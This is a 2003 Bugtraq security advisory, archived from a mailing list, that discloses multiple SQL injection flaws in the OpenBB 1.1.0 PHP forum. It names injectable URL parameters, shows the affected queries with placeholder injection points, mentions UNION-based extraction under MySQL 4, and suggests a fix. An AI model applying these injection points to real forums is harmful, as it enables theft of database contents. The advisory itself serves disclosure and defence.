linux, säkerhet

99663 2003-04-25  18:07  /104 rader/ Albert Puigsech Galicia <ripe@7a69ezine.org>
Importerad: 2003-04-25  18:07  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: ripe@7a69ezine.org
Mottagare: Bugtraq (import) <4644>
Ärende: Multiple SQL injection on OpenBB forums
------------------------------------------------------------
/-----------------------------------------------------------------------------\
|                             7 A 6 9 - A d v                          C: 008
|-----------------------------------------------------------------------------|
|
|                     [ SQL injection on OpenBB forums ]
|
\-----------------------------------------------------------------------------/
                                                                | 22/04/2003 |
                                                                \------------/

Data.
-----

        + Typo:         SQL injection

        + Software:     OpenBB.

        + Verions:      1.1.0 (curent version).

        + Exploit:      Yes.

        + Autor:        Albert Puigsech Galicia

        + Contact:      ripe@7a69ezine.org




Introduction.
-------------

        OpenBB is a complet forum writen in PHP language, that uses
MySQL database. More information about this software can be readed on
openBB oficial website; http://www.openbb.co.uk.


Description.
------------

        There are multiple SQL injection vulnerabilities on OpenBB's
current version.

        All PHP scripts that makes an SQL query, including numeric
value introduced by web user allow to inject our own SQL code inside.



Explotation.
------------

        Is posible, as in other similar cases of SQL injection, to
extract information from database. If vulnerable host are using MySQL
3 we must to use LIKE method(*), but if MySQL's version 4 are used we
are allowed to use UNION, that make exploit more easy.

        To exploit this vulnerability only need to add an space (or
%20) behind the number, and next our SQL alteration.

        Some examples of this SQL injection on OpenBB may be
this. The examples contains the url to exploit it and the SQL query
done (look at '<something>', that it's our own SQL code):


        http://vulnerable/index.php?CID=1 <something>

        SELECT guest, forumid, title, lastthread, lastposter, lastposterid,
        lastthreadid, lastpost, moderators, description, type, postcount,
        threadcount, forumkey FROM obb_forum_display WHERE
	parent = 3 <something> ORDER BY displayorder


        http://vulnerable/board.php?FID=2 <something>

        SELECT title, threadcount, type, hidden_topics, forumkey FROM
        obb_forum_display WHERE forumid = 2 <something>


        http://vulnerable/member.php?action=profile&UID=1 <something>

        SELECT * FROM obb_customvalues v INNER JOIN obb_custompermis p ON
        p.fieldid = v.fieldid INNER JOIN obb_customfields f on
        f.fieldid=v.fieldid WHERE v.userid=1 <something> AND
	p.canviewothers='t' AND p.groupid='0'



Patch.
------

        There is no a patch yet, but the problem is solved if you put
inverted commas on every number variable included on SQL query or
check if the variable is realy a number.


--
>====================================
> Albert Puigsech Galicia (7a69)
>
> http://ripe.7a69ezine.org
>====================================
(99663) /Albert Puigsech Galicia <ripe@7a69ezine.org>/(Ombruten)